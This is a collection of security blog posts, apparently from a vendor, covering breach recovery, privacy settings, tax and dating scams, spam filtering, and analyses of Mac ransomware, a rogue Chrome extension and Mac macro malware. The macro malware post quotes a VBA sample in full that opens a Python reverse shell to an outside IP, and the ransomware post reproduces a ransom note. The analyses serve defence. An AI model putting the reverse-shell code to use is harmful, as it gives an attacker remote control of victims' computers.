Malwarebytes is proud to support Cybersecurity Factory, a 10-week summer program for early-stage cybersecurity companies. This program runs in collaboration with Highland Capital Partners provides teams with a $35,000 convertible note investment, office space, and dedicated security mentorship from industry leaders at leading companies throughout the United States.
Security software startups face several unique challenges. The advantage of new technologies is hard to communicate, and can be even harder to demonstrate, to customers. Reputation is paramount, but can be damaged overnight. Sales models are rapidly evolving, and keeping up with them requires both agility and experimentation. Despite these challenges, hackers are continuously trying to penetrate systems and exploit vulnerabilities. There is a strong need for security innovation to stay ahead of these attackers.
Cybersecurity Factory is attempting to fulfill this need by providing the support and mentoring to help teams with business and product strategy and to help them build a network of entrepreneurs and investors to identify key opportunities in the security market. During the summer, each team will work closely with our security mentors and potential customers to produce and improve a marketable prototype.
Applications are open! The early deadline is 3/6 and the program will accept applications on a rolling basis until 3/20.
If anyone has questions about Cybersecurity Factory, don’t hesitate to email the team at email@example.com.
As a leading security provider, Malwarebytes is excited to help facilitate and support new innovation in the security market to keep users and companies safe.
More companies are falling victim to cyberattacks, as a wide range of harmful software, social engineering schemes and scams threaten to compromise the personal information and online safety of their clients. With cybercrime rates on the increase every year, it is important for businesses of all sizes to have a recovery plan in place to mitigate any losses. In the unfortunate event of a data breach, these are the steps you should take to recover.Identify and Contain the Problem
On average, companies do not know about data breaches or cyberattacks until at least 200 days after they have occurred. As soon as you become aware of a security incident, the first step is to identify and contain the problem.
Having all of the correct facts will go a long way to helping to formulate an effective response plan, and better inform your communications with customers. When identifying a data breach, ensure that you document the following:
To contain and remove the issue, your IT department should be ready to spring into action. To ensure that they are prepared for such a task, any business owner should hire a cybersecurity specialist or send their IT staff for cybersecurity training. They should be prepared to:
Large companies tend not to have a history of a responding to cyberattacks in a timely manner. While they react quickly by containing the breach, it is often months before they address the general public and even those affected by the incident.
British mobile phone operator TalkTalk was criticized for waiting to inform customers of its data breach in 2015, and things haven’t improved over the years. In 2016, Yahoo took five months to respond to customers who had their data stolen. It is this kind of behavior that causes companies to lose customers and even sets them up to face class-action lawsuits. In fact, TalkTalk lost 101,000 customers as a direct result of its data breach.
The solution is to act quickly and ensure that you have a response plan ready long before any cybercrime has occurred. Liaise with your PR and Marketing departments to prepare communications that you can issue in the event of a data breach. It should include information about compensation and outline any steps that you’re taking to prevent future security incidents, such as implementing new cybersecurity protocols. When the time comes to distribute this information, your IT team will be involved to fill in the specific details.
One of the best examples of an effective cybercrime response is Home Depot. In 2014, the company faced data breach that compromised the banking information of its customers. Its PR team took to social media right away, informing customers that staff are looking into the issue and working with law enforcement.
Usually, organizations that experience data breaches lose an average of $3.97 million due to lost customers. However, Home Depot actually saw a 5.7 percent increase in net sales during the following quarter. Its proactive approach to communication certainly had a positive effect on the company’s profits.Prevent Future Breaches
In the event of a data breach, it is important that you have the right professionals on board to help your business recover. According to IBM, enlisting in the help of cybersecurity experts can help you save millions as your company aims to contain a data breach and respond to the affected parties.
Research by Ponemon Institute, LLC found that enlisting in cybersecurity professionals can help drive down the costs of data breach recovery. Employing experts in online security saved companies $2.1 million per year while hiring a high-level security manager like a CISO saved $2 million.
Companies can also lower their defense costs by investing in online security technologies. Security intelligence systems saved companies an average of $3.7 million while encryption technology saved companies $1.4 million per year. Using advanced firewalls saved them $2.5 million.Tighten Up Your Legal Defense
After having their information compromised by a data breach, it is not uncommon for customers to sue the company. With Yahoo facing a class-action lawsuit in light of its recent data breach that affected over 500 million accounts, it is important for companies to prepare for the fact that they may be taken to court for allowing a hacker access to their customers’ personal information.
The Department of Justice advises business owners to form a relationship with local law enforcement offices before a cyberincident has the chance to occur. This establishes a point-of-contact in the event of a data breach, to whom you can report the crime.
Legal counsel should also be retained before any cybercrimes have the chance to be committed. When doing so, business managers should ensure that their legal team has experience with cyberincident management. They should have the knowledge necessary to help guide you when reporting the breach to customers, navigating your liability for taking corrective measures and interactive with government agencies. As this is an emerging legal issue, your legal team should stay up-to-date with the latest developments so they prepared to handle any situation.
In the event of a data breach, companies can avoid lawsuits by taking proactive measures to take care of customers. Some companies like Neiman Marcus have offered victims credit monitoring services, which not only demonstrates great customer service but also weaken claims that customers may make about having suffered harm as a result of the data breach.
The best defense is a good offense, so companies should be proactive in preventing cyberattacks from occurring in the first place. Since 66 percent of data breaches are caused by employee negligence, business owners should take measures so that there are no insider threats. As such, all staff members should be trained in the best practices for cybersecurity.
Being prepared and acting quickly are vital to helping your company recover from a cyberattack as effectively as possible. Your customers will appreciate that you’ve taken action promptly to protect them, which goes a long way to maintaining a successful and profitable business in light of a data breach.
Author Bio: Faith is a technology blogger for Secure Thoughts, a leading resource on cybersecurity. With a background in marketing, she specializes in helping businesses engage in effective communication in the event of data breaches and other cyberincidents.
February has been a relatively busy month in the world of Mac malware, and now it has gotten busier with the appearance of the second piece of ransomware ever to affect macOS. Fortunately, this is quite poor ransomware that will only bite those who are doing something wrong in the first place. Nonetheless, it’s good enough to cause your day to go bad in a very big way if you get infected.
This malware, which an update to Apple’s XProtect signatures calls Findzip, was found and described by ESET. According to their report, Findzip has been found on piracy sites masquerading as cracks for Adobe Premier Pro and Microsoft Office, although ESET was careful to point out that there may be other such files out there.
These apps are signed, but with a certificate not issued by Apple, which is unusual. Fortunately, they won’t open by default on a Mac as a result of this.
Unfortunately, this requires that the app be “quarantined.” A properly quarantine-aware app, such as any of the major web browsers, will download files in such a way that the “quarantine” flag is set. Whenever an app or any other kind of executable file is opened, if it has the quarantine flag set, the system will prevent it from opening if it is known malware or isn’t properly signed.
However, torrent clients typically do not do the right thing, in this case, and will often leave the quarantine flag unset on files they download. So the very people who are likely to be downloading this malware are also the people who will be most vulnerable to it. They will not be prevented from opening the malicious app simply because it isn’t properly signed.
When opened, the malware displays a rather goofy-looking mostly-transparent window:
At this point, nothing will happen unless you click the “start” button. You can feel free to quit the app again at this point without suffering any consequences.
If you make the mistake of clicking the “start” button, the malware will begin encrypting the files in your home folder, showing a message indicating that it is patching the app (Adobe Premier Pro or Microsoft Office) and that the process may take up to 10 minutes. Letting the process go quickly made a big mess of my desktop, which should cause even the most clueless pirate some concerns.
The numerous README, DECRYPT, and HOW_TO_DECRYPT files all contain the same instructions:NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption method. What do I do ? So , there are two ways you can choose: wait for a miracle or start obtaining BITCOIN NOW! , and restore YOUR DATA the easy way If You have really valuable DATA, you better NOT WASTE YOUR TIME, because there is NO other way to get your files, except make a PAYMENT FOLLOW THESE STEPS: 1) learn how to buy bitcoin https://en.bitcoin.it/wiki/Buying_Bitcoins_(the_newbie_version) 2)send 0.25 BTC to 1EZrvz1kL7SqfemkH3P1VMtomYZbfhznkb 3)send your btc address and your ip (you can get your ip here https://www.whatismyip.com) via mail to firstname.lastname@example.org 4)leave your computer on and connected to the internet for the next 24 hours after payment, your files will be unlocked. (If you can not wait 24 hours make a payment of 0.45 BTC your files will be unlocked in max 10 minutes) KEEP IN MIND THAT YOUR DECRYPTION KEY WILL NOT BE STORED ON MY SERVER FOR MORE THAN 1 WEEK SINCE YOUR FILE GET CRYPTED,THEN THERE WON'T BE ANY METHOD TO RECOVER YOUR FILES, DON'T WASTE YOUR TIME!
The encrypted files, having filenames ending in .crypt, are created using the zip command in the shell to create encrypted .zip files. These files are all given the same passcode, a randomly-generated 25-character string. Interestingly, .crypt files are created for folders, but don’t appear to contain the folders’ contents. Instead, there are more .crypt files inside the original folders. Only files actually get encrypted, and subsequently deleted.
Amusingly, this even applies to the malware itself! After it runs once, if it was run from somewhere in the user folder (like the Downloads folder or the desktop), it’ll never run again.
Unfortunately for affected users, this ransomware is broken as far as “customer service” is concerned. The key used to encrypt the files is never uploaded to a command & control server anywhere, so that hacker would have no way to help you decrypt your files if you paid him. This is a perfect example of the dangers of paying the ransom… there’s never any guarantee that your payment will get you your files back. It certainly won’t in this case. Once encrypted, only a backup can save your data.
There has been some speculation about whether ransomware can or cannot affect a Time Machine backup. ESET reports that it will try to encrypt files found on all connected external or network volumes, so naturally I wondered if Time Machine backups might be included.
I let it loose on a dummy backup, made from my test system, and let it run for 45 minutes. Although it definitely was accessing the external drive, the backups were never damaged in any way. I was still able to restore files from the backup at the end of the test. Of course, a different kind of backup that is connected at the time the malware runs could be affected.
In all, this is not a serious threat to most people. Only those who are engaging in software piracy will encounter it, and even then there are plenty of red flags before they get to the point of actually clicking the “start” button. Unfortunately, if you do run the gauntlet and end up getting your data encrypted, and you don’t have a good backup, this malware will really ruin your day.
Malwarebytes detects this as OSX.Findzip.
Many of us are all too aware of the uptick in news stories about phishes, online scams, and customer data breaches. Social media can be a popular vector for attackers to sift through data to answer your password recovery questions, send phishes and spam, and generally be a nuisance. So we’d like to secure our profiles as much as possible, but platforms built on monetized sharing of data tend to design interfaces around…sharing your data. Oftentimes there is no obvious button to click to activate common sense security measures, which can put users off of securing their info at all. So let’s plummet head first into menus, buttons, and check boxes and see how we can be a little safer when choosing to share information online.Twitter
1. Click your profile icon in the upper right corner of the screen and click “Settings”.
2. In the left sidebar that appears, click on “Privacy and Safety”. This is where all the good stuff can be found. Scroll down to “Direct Messages”, and make sure “Receive Direct Messages from anyone” is unchecked.
3. Under “Tweet Privacy,” checking “protect my tweets” will make everything you post going forward invisible to people who don’t follow you. Further, you will be able to approve new followers on a case by case basis. If you work in advertising, this is not a great setting to have checked. But for the rest of us, it’s probably worth considering.
**BONUS SETTING** Twitter likes to stay in touch, a lot. If, perhaps, Twitter notifications start to feel a little clingy and desperate, click on “Email notifications” in the settings sidebar. Scroll down to the bottom, and you’ll see “Updates from Twitter.” (Note that Twitter has thought of many, many things to update you on. If you uncheck everything but the top option regarding product updates, your inbox should get some relief.)
NOTE: it appears that you can only do this from a mobile device, not the desktop application.
1. Tap your profile icon in the bottom right hand corner.
2. Click the “Settings” icon in the top right hand corner.
3. Scroll to the bottom and slide the “Private Account” button on. This will make all your photos within the app private, and prompt you to approve new followers individually. However, people can still send a photo directly to you even if they’re not following you.
**BONUS SETTING** If you scroll further down to “Settings”, there is an option “Cellular Data Use.” If you switch that to on, Instagram will stop preloading videos in your feed, which might be helpful if you have a slow connection, or limited data.
While the safest way to LinkedIn is always LinkedIn abstinence, some of us face peer pressure to LinkedIn before we’re ready. To make sure you’re practicing proper harm reduction techniques, click the “Me” button in the top right of the screen, and under “Account,” choose “Privacy and settings”.
Next, click the Header that says “Privacy” towards the top of the screen. The most important setting listed here is “Edit your Public Profile.” What this actually means is “Decide if search engines are allowed to index my information and display it when someone searches my name.” There are very few use cases in which such a thing would be beneficial, so the suggested answer to this is No.
The other important setting is “Sharing data with third parties,” which should almost always be No.
**BONUS SETTING** Clicking on the “Communications” header brings up settings governing how LinkedIn is allowed to contact you. If you scroll down to the very bottom, there’s an option “Partner Inmail.” You most likely do not want LinkedIn advertisers to send you direct messages, so choose No.
Quitting social media entirely can be unrealistic, or at least seriously unfun. So it’s important to take a moment to check out account settings before you start, to make absolutely sure you’re okay with the service’s default settings. (You probably should not be.) Once you’re comfortable with the security settings on your profile, tell your friends. You spent all that time digging through menus and checkboxes, and you don’t want your work undone by one of your connections, do you?
It’s everyone’s favorite time of year—tax season. While you might be looking forward to it with a mixture of trepidation and dread, cybercriminals are positively drooling at the prospect of all that personal data out there on the Internet for the taking.
So what’s the worst that can happen? In a couple words: identity theft. Nearly 250,000 new reports of identity theft were filed in 2016 with the IRS. Tax-related ID theft happens when criminals use your personal information to file for a tax refund with the IRS. Through September 2016, the IRS stopped 787,000 confirmed identity theft returns, totaling more than $4 billion. Besides having your rainy-day money stolen, this can also damage your credit and cost you in time. It can take upwards of 600 hours to restore a stolen identity, according to the Identity Theft Resource Center.
But you needn’t fear (unless you’ve been cheating on your taxes, in which case we can’t help you). In response to an uptick in tax fraud and identity theft last year, the IRS has launched new security safeguards in order to verify identity and the validity of returns, especially for those who prepare their own federal and state taxes using software programs. In addition, if you take your own proper precautions, you can shore up your online safety.
So what are some ways you can protect your information (and identity) during tax season? Here are some tried and true tips to help ease the stress.For general tax preparedness
If you haven’t already filed, now’s the time to get a move on. “Start early, gather all your information in one place, and make sure it’s accurate,” says Mark Harris, CFO of Malwarebytes. Not only will you beat the rush, but you can ensure a faster return on your return. Mistakes, including those that can lead to identity theft, are made when you’re scrambling to dig up that charitable donation receipt from Goodwill five minutes before filing deadline.
Next, pick a preparer. Do your due diligence and check out any reviews or articles on tax software, if you plan to use it. Research online tax service providers to see how secure their systems are. Sites should have password standards, a lock-out feature that blocks users after too many unsuccessful login attempts, security questions, and email and/or text verification. If using an accountant, look for referrals. Remember that cheapest may not always be the best.
Finally, once you’ve filed, make sure to keep your tax returns someplace safe. If filing online, you’ll receive a massive PDF that you can download to your desktop. If someone were to access your computer a year from now, all that juicy information would be theirs for the taking. So be sure to either store it in an encrypted cloud service or put it on a removable drive, such as a USB. If filing on paper, keep your taxes in a locked file cabinet or drawer.For online security
This is important for anyone transmitting sensitive data online, whether that’s shopping or filing taxes: be sure to use a connection that’s secure. If on a home computer and network, use password-protected Wi-Fi and look for secured browsers (website URLs that start with “https” and display a small lock icon). Be sure your preparer has the same security in place. Never, ever, ever file your taxes using public Wi-Fi.
In addition, when filing taxes online (and again, this applies to any online service that requires a password), choose passwords that are long and complex. Avoid plain text passwords, use special characters, and if allowed, use spaces. We also highly recommend a password vault or manager that uses two-factor authentication.
The third pillar of Internet security (especially during tax season) is to be aware of social engineering scams, including phishing emails. A popular phishing technique is to send an email from the “IRS” that says, essentially, “We have your tax return ready and you can get your money faster if you just download this PDF!” Nope. Number one, you should never open an attachment from an email you aren’t expecting to receive. Number two, the IRS will not email you. They’ll physically mail you information, but even then, be wary. Tax scams can happen via postal mail, too.
In addition to phishing attacks, there are reports of cold callers who say, essentially, “Hey, we’re from the IRS and you owe us $10,000.” Nope. The IRS won’t call you either. If you receive an email or phone call that’s unsolicited and is looking for personal information, don’t give it. Go back and independently verify who is trying to reach you.
After mastering the basics of online security best practices, it’s a good idea to protect yourself using a little technology. Before you even start typing in your social security number, you should run at least one kind of cybersecurity scan. That way you’re sure there’s no malware on your system, such as a keylogger or spyware that can record your information without you knowing. You should also make sure your operating system, browser, and other software programs are updated—that way, you protect against malware that might exploit vulnerabilities in your computer.
Finally, if you believe there’s a chance you could have been compromised, look into a credit monitoring or ID theft service. By law, you are entitled to a free copy of your credit report from the three major bureaus: Equifax, Experian, and Trans Union. In addition, there’s a lesser-known fourth bureau called Innovis that you can also use. Review your reports annually and look for any suspicious activity.
Filing early, being prepared, staying vigilant online, and employing the proper security technology—if you follow these tips then you can not only keep cybercriminals from cashing in on your tax returns but also from taxing your peace of mind.
Given Google Chrome’s popularity, it is no surprise to see it being more and more targeted these days. In particular, less than reputable ad networks are contributing to the distribution of malicious Chrome extensions via very deceptive means.
In this post we look at a forced installation of such an extension that eventually leads to more adverts being force fed into Chrome. And once you spin the malvertising roulette, anything can happen…Malvertising campaign
Google Chrome users are profiled based on the user-agent string they show whenever they visit a website. Rather than redirecting them to an exploit kit, they are often redirected to fake software updates, scams, or rogue browser extensions.
This malvertising flow (XML feed) shows how the user is redirected to a bogus site that is enticing them to install a Chrome extension.
Enticing might in fact be a euphemism, since in this case the user is giving no choice other than “Add Extension to Leave“, while their browser is stuck in a never ending loop of fullscreen modes. The tricks used here are very similar to what Pieter Arntz described in his Nov. ’16 blog (Forced into installing a Chrome extension).Hidden but omnipresent
Once installed, this extension ensures it stays in hiding by using a 1×1 pixel image as its logo (note the blank space on the top right next to the Chrome menu from the animation below) and by hooking chrome://extensions and chrome://settings such that any attempt to access those is automatically redirected to chrome://apps. That makes it much more difficult for the average user to see what extensions they have, let alone uninstalling one of them.
The larger one reveals a connection to a command and control server where it can receive instructions on what to do next:
The perpetrators behind this extension are checking for certain keywords within the current URL and blocking/redirecting if the conditions are met. For instance, if the user tries to visit the Malwarebytes website, the browser will immediately get redirected, first to a YouTube video, and then to one of various Potentially Unwanted Programs (PUPs), get-rich-quick schemes, and various other scams.
This blog post wouldn’t be complete without a tech support scam which it seems one can’t avoid these days. If the user clicked on a new tab or typed a ‘forbidden’ keyword, the redirection chain would then deliver a fake Microsoft warning.
Google Chrome extensions are very powerful programs which are extremely useful in extending the browser’s capabilities, but can also be used for malicious purposes. Unfortunately, it is way too easy for online crooks to trick people into installing their malicious extension.
If you ever visit family or friends who run Chrome or own a Chromebook, have a check at the installed extensions on their machines, and you’ll be surprised by how many shady or flat out fraudulent ones are in there.
In addition to redirecting to bogus sites and junk offers, there are some serious privacy and security implications (Rogue Google Chrome Extension Spies On You) when an extension can read what you type and send this information to criminals.
Google has pulled this bogus extension from its store. If you already have it installed and can’t get rid of it (it won’t let you do it the regular way), please download Malwarebytes and run a scan. We detect and remove this one as Rogue.ForcedExtension.IOCs
Backend server (ad fraud/malvertising):
Tech support scam:
Bayesian spam filtering is based on Bayes rule, a statistical theorem that gives you the probability of an event. In Bayesian filtering it is used to give you the probability that a certain email is spam.
Named after the statistician Rev. Thomas Bayes who provided an equation that basically allows new information to update the outcome of a probability calculation. The rule is also called the Bayes-Price rule after the mathematician Richard Price, as he recognized the importance of the theorem, made some corrections to Bayes’ work and put the rule to use.
When dealing with spam the theorem is used to calculate a probability whether a certain message is spam based on words in the title and message, learning from messages that were identified as spam and messages that were identified as not being spam (sometimes called ham).
The objective of the learning ability is to reduce the number of false positives. As annoying it might be to receive a spam message, it is worse to not receive a message from a customer just because he used a word that triggered the filter.
Other methods often use simple scoring filters. If a message contains specific words a few points are added to that messages’ score and when it exceeds a certain score, the message is regarded as spam. Not only is this a very arbitrary method, it’s also a given that this will result in spammers changing their wording. Take for example “Viagra” which is a word that will surely give you a high score. As soon as spammers found that out they switched to variations like “V!agra” and so on. A cat and mouse game that will keep you busy creating new rules.
If the filtering is allowed for individual input the precision can be enhanced on a per-user base. Different users may attract specific forms of spam based on their online activities. Or what is spam to one person is a “must-read” newsletter to the next. Every time the user confirms or denies that a message is spam, the filtering process can calculate a more refined probability for the next occasion.
A downside of Bayesian filtering in cases of more or less targeted spam is that spammers will start using words or whole pieces of text that will lower the score. During prolonged use, these words might get associated with spam, which is called poisoning.
A few methods to bypass “bad word” filtering.
Bayesian filtering is a method of spam filtering that has a learning ability, although limited. Knowing how spam filters work will make it more clear how some messages get through and how you can make your own mails less prone to get caught in a spam filter.
Last week, we gave a shout out to Safer Internet Day, passed around some tips for safe(r) public Wi-Fi use, and took a deep dive into Spigot browser hijackers. We had double the trouble in Mac land, with the defense industry coming under fire from rogue downloaders, and Microsoft office macro Malware.
Stay safe, everyone!
With Valentine’s Day rapidly approaching, love is in the air and so are Valentine’s Day security tips blogs, of which this is one. While you dash out for a last-minute purchase of flowers and a “Happy 5th Birthday” card played as a gag because they were all out of romantic ones at the store, please keep the below tips in mind if you’re browsing the aisles of popular dating sites and apps. You’re probably familiar with some of them already, and many of the below are good for all manner of online activities. In no particular order…1. Are you in my area?
Make sure the profile you set up on a dating network doesn’t have geotagging enabled, regardless of whether you created it on a website or through an app. Some dating sites base the location you initially enter to serve up a list of possible matches within a certain radius, but they don’t display the location info on your profile – get familiar with the granular controls on the dating site’s settings and make sure you understand the differences. Many mobile apps aren’t hugely clear about “which thing does what”, so if in doubt, disable a particular feature until you can be 100% sure. As a side-note, ensure you don’t have geotagging enabled on any photographs you upload – if in doubt, use a picture from a public location away from your main residence. You can also use online tools to check what EXIF information is stored in images you want to use and remove it if needed.
You’ll find some additional practical advice in terms of real world security on the Selfie Security blog we posted a few weeks ago. You should pay particular attention to not including location specific items in your photograph(s) such as bills with your address on them.2. Hang on to your moneybags: social engineering tactics
Scammers setting up fake profiles then asking for money is astonishingly common, and it’s all to easy to be taken to the cleaners as a result. Just like 419 scams, romance fakers often use templates – or just lazily cut and paste Bot spam to reuse for their own purposes – and fans of dating sites should get into the habit of Googling common phrases, just to see if someone else is saying the same thing. If a wave of Susan J. Fakename is posting identical romantic overtures on six different sites, you can be sure it’s time to move along.
With regard to common scam angles, watch out for anything related to:
On a related note, don’t ever let strangers send money to your bank account for any reason. They’ll probably get you to forward the cash on to someone else, and at that point, you’ve become a money mule.
That’s a criminal offence and will get you into trouble, by the way.3. “Check out my other profile…”
Be cautious around links sent your way which direct you to another website, and be particularly careful around links to downloadable files. Scammers will often try and remove you from the relative safety of the service you happen to be using, directing you to links and files that the dating site you started with can’t hope to contain. That’s been a staple attack on social media sites for many a year, but it works with dating too.
If someone sends you shortened URLs, you can usually expand them to see where they end up. If you’re still not sure, try googling the link. If nothing still comes up to allow you to make an informed decision, you should just ignore whatever you’ve been sent – it isn’t worth the risk.4. Remove that personal info
Don’t put your real name / age / location in your profile, email or anything else related to the dating site you’re on. Anonymous usernames are fine. You should also use a disposable email address when you sign up to a new dating service – not only will this keep people you’d rather not stay in touch with away from your main mailbox, it’ll also be obvious if a dating site decides to sell your email to spammers. This is a good trick to use outside of online dating, too.5. Bots! Bots everywhere!
If you have an open private message system, you’ll likely receive many, many messages from people wanting to chat. Some dating websites will also send multiple daily messages to users via email claiming that persons x, y, and z would like to talk to you. They may even ask about cookie dough (and it better be delicious considering the eventual $118.76 monthly fee). Most dating bots will cycle through a canned script of a dozen or so phrases before claiming you need to be “verified” in some way. This will inevitably lead to a request for payment information. Don’t do it – if in doubt, contact the service you’re using and ask them about it directly. You’ve probably seen examples of this on blogs about Skype spam.
Bots will advertise everything from pornography to mobile games, and spammers commonly use images ripped from the net for their profile avatars. You can try and see if the picture is a stock photo by using the “Search Google for this image” option in your browser, or fire up TinEye to see what’s out there.
Bot accounts probably won’t have a realistic looking bio, or have links to profiles on popular social networks. If it looks cookie-cutter, there’s a good chance it might be. Feel free to see if they pop up across the web anyway and you’ll quickly learn if they’re one of a kind or part of a wave of identikit bots.6. “Got any pics?”
Be wary of people asking for intimate photographs and / or video, as this is a surefire way to find yourself blackmailed into handing over lots of money. If you do pay the blackmailer, there’s no guarantee the images won’t be leaked anyway. There’s also the issue of revenge porn to consider, and the legal issues that will inevitably arise as a result.
Put simply: don’t do it.
Hopefully the above will help to keep you out of trouble while swiping left (or right? I have no idea), and here’s to a safe online Valentine’s Day experience for everybody.
Last November, I gave a talk in Ireland at the fantastic IRISSCON, a huge annual security conference which covers everything from social engineering and use of language to the criminal underground and heart hacking.
My talk was all about EULAs, or at least, it used EULAs as a starting point before quickly moving into the land of mobile and the crazy assortment of Privacy Policies on offer.
The EULA is an End User License Agreement and generally sets out things like your ability to use, copy (or indeed, not copy) the product sitting in front of you. More often than not, there’ll be a Terms of Service which explains what you can do while using the product, a sort of “what you can reasonably expect to take place while the wheels are in motion”. These can be more important in mobile land than on a desktop, where apps and software as a service reign supreme.
Where this gets interesting is that Privacy Policies are typically all about the adverts, tracking, and analytics you can expect to run into on your travels. Just like websites, ads are usually how free games make their money – regardless of whether or not they use in-app purchases. I’ve written about Advergaming many times – here’s 5 blogs for you to get your teeth into:
Previously, device owners could try and bypass adverts on their devices through all manner of antics – here’s people using OpenDNS to block Xbox dashboard ads – so it was inevitable that adverts would eventually become something you can’t get around anymore. Behold, the advert as a game mechanic:
Yeah, there’s no way to dodge that. There’s a weird grey area where parents let their kids download / play all manner of things on their devices, or buy tablets specifically for the children to use, so they’re “theirs” but the data on the device is a mashup of both parent and child. Some games need registration, logins, permission from an adult over 13 years of age and so on. With that in mind, it’s quite important to ensure you know where your data is going, which is probably why Privacy Policies are such a big deal.
I’m not sure how many successful EULA challenges have passed muster in a court of law, but anything involving leakage/theft/bad things in general related to PII never tend to go well for the offending party. That’s probably why we end up with such a headache when trying to deal with companies attempting to cover themselves from unwarranted blame, because that way lies madness – and lots of words.The problem with words
Unfortunately, this isn’t possible.
Most mobile games make use of multiple advertisers/networks, and some are region specific so what you see in country A won’t be what you see in country B. As a result, you end up flowing down a river of “here’s two more links to two more policies – and both of those links to some of their partners, so here’s a few more – and this – and that – and one of these”.
Here is your 2017 experience:
Incredibly important information about what’s happening to your data is often not placed in the app itself, because the app maker wants you to get right into the act of making them some money and tons of words would be a bit of a distraction, and worse still, the app maker is relying on the ad network/provider/whoever to actually have the correct information available, online, in an easy to digest format. Effectively, you’re seeing a EULA at app launch, but the PII references are all sitting on a website somewhere – or, even more confusingly, a whole bunch of third-party websites.
Did you read it all? Of course you did.
At time of writing (well, at time of putting together the slide deck) the top games on the Play store were as follows:
Taps to Riches: 1245 words
Block! Hexa Puzzle: 678 words
Rolling Sky: 586 words
Essentially, if it’s decided that the app doesn’t handle what is considered to be PII, then it doesn’t need to list anything. You can see the problem here; without any form of information whatsoever with regards what the app is doing with said data (outside of notifications related to what device functions it may make use of), there is no way for the consumer to make an informed decision.
Elsewhere, we have Privacy Policies ranging from 500 words to just over 2,000. There are various readability tests which will try to establish how complicated a piece of text is; these can take in very complicated mathematical equations, or look at what % of words contain more or less than 7 letters, or compare the whole text against a set of a couple of thousand “common” words, and increase the complexity score every time words appear which aren’t listed.
Unfortunately, in certain circumstances there may just be too many words to deal with to gain a firm understanding of exactly what you happen to be dealing with. In the follow-up post, you’ll see exactly what I mean.
Bring some background music, a soft bedside light and a large pair of reading glasses.
You’ll need them.
Macro malware – commonly known as a “Word macro virus” – involves maliciously-crafted Microsoft Office documents containing Visual Basic macros. These things have been around for quite some time, but have mostly just been a nuisance to Mac users. Unfortunately, that has now changed.
Historically, Microsoft Office for Mac supported macros up through the 2004 edition and were thus susceptible to macro malware. Such malware was mostly targeted at Windows users, however, and for the most part did little to Mac users other than potentially infecting their “normal” template – the template from which all blank new documents are created. This would result in future documents created on that computer being infected with the macro malware, which could then be passed on to others.
Then Microsoft released Office for Mac 2008, which removed macro support. This upset a lot of long-time professional users of Office for Mac, who made use of macros. However, this was a move that security-savvy Mac users celebrated, as it made Macs immune to macro malware.
In 2011, a new version of Office for Mac ushered the macro back in. Fortunately, it also brought a setting to warn the user if a document containing macros was being opened.
This setting, which was on by default, did a lot to prevent a new rise of macro malware on the Mac, while allowing macro-loving Mac users to upgrade from Office for Mac 2004.
Macro malware has been off most Mac users’ radar for some time. Even as a security expert, I rarely come across such malware these days. However, that all changed recently, when a malicious Word document was found targeting Mac users.
Notable Mac security expert Patrick Wardle provided an excellent analysis of the malware. I can’t improve on what he said, but in essence, the malware would first check for the presence of Little Snitch, a well-known Mac outgoing firewall.
If Little Snitch was present, it would bail out. Otherwise, it would download and install a second-stage component (which was no longer available) and set it to run persistently, via one of several Mac-specific persistence methods.
Another sample of macro malware, which was found shortly after, attempts to connect via reverse shell to a malicious server, first on Windows, but then trying with Mac code if that fails:Function macshell() On Error Resume Next Err.Clear scriptToRun = "do shell script ""python -c 'import urllib2,socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\""18.104.22.168\"",53)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' &""" res = MacScript(scriptToRun) End Function
This brings up questions of how Mac users can protect themselves against this kind of threat. Fortunately, it’s not difficult. First and foremost, you should exercise caution before opening any Office document from untrustworthy sources, such as an e-mail from a stranger or an unfamiliar website.
If you do need to open a document, the “Warn before opening a file that contains macros” setting, which was mentioned previously, should be turned on by default. It would be wise, however, to verify this, by going to the Security & Privacy settings in the preferences for Word, Excel, and PowerPoint and turning it on if it isn’t already.
With this setting on, trying to open a document containing macros will display a warning.
The default is to open the document with macros disabled, which prevents the malware from triggering. If you have any questions about the legitimacy of the document, or if you know of no reason why it should contain any macros, you should not click the Enable Macros button!
If you’re paying attention and have not disabled the ability of your Office apps to protect you, it will be difficult or impossible for this kind of malware to infect you. However, there are invariably those who will fall prey to the social engineering used by these fake documents and who will re-open them with macros enabled.
Don’t be one of those people, and pass this information on to those you know who might be fooled.
Researchers Claudio Guarnieri and Collin Anderson recently discovered new Mac malware, which they have dubbed MacDownloader. They report that this malware appears to be the work of Iranian hackers and is targeting US defense contractors, such as Lockheed Martin, Sierra Nevada Corporation, Raytheon, and Boeing.
The malware was first found on a spearphishing site, claiming to offer “Special Programs and Courses” to interns at these companies. The site showed a “broken video,” using the common trick of claiming that Adobe Flash Player was outdated and offering a link to a “Flash installer.”
That “Flash installer” was the malware dropper – although, as we’ll see, “dropper” may not be a very accurate term. The installer was a simple app, named “addone flashplayer” and has a Flash icon. (SHA256: 52efcfe30f96a85c9c068880c20663db64f0e08346e0f3b59c2e5bbcb41ba73c)
When run, the malware immediately opens a window offering to install the update.
To those who know better, this doesn’t really look much like an actual Adobe Flash Player installer, but many people won’t realize that. There are some other red flags as well, such as some odd phrasing and other errors in the text shown.
The biggest red flag, though, is the name of the application shown in the menu bar next to the Apple menu. As can be seen from the screenshot above, it claims to be Bitdefender Adware Removal Tool. This is the first sign of a serious split personality issue in this malware, which can’t seem to decide whether it’s a Flash installer or an anti-adware program.
Interestingly, if the user clicks the Close button here the malware quits without doing anything else. That’s highly unusual for malware and is likely to be a sign of the poor coding that Guarnieri and Anderson mention in their analysis.
If the user chooses to proceed with the “update,” the malware will then show a rather odd window for what is supposed to be a Flash updater: a claim to have detected malware.
Again, there are some issues with phrasing and spacing in the text of this alert, not to mention the fact that a Flash updater should not be scanning your system like anti-virus software. (There’s also the fact that it calls iWorm “adware,” when it’s actually old malware, but the average user won’t know that there’s anything wrong with that.)
Guarnieri and Anderson believe that this malware was probably originally developed as a fake anti-virus app and hastily or sloppily repurposed into the form of a fake Flash updater, having found other evidence in the app that it was designed to imitate Bitdefender.
After clicking OK here, the user is asked for a password because “System Preferences wants to access from current application.”
At this point, many people will be extremely suspicious. Fortunately, if the user decides to cancel at this point, the app will again exit without doing anything else.
